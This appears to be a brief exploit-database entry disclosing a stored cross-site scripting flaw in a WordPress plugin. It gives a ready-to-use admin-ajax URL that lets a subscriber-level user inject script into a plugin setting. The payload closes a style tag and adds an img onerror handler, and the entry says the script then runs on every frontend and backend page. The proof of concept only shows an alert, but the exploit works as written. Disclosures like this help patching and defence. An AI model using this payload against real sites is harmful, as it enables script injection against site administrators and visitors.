Share 
## https://sploitus.com/exploit?id=WPEX-ID:84F53E27-D8D2-4FA3-91F9-447037508D30
Open the following URL when logged in as a subscriber:

`https://example.com/wp-admin/admin-ajax.php?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true&settings[cssCode]=</style><img src%3D1 onerror%3Dalert(document.domain)>`

The XSS will be triggered in any pages (both frontend and backend)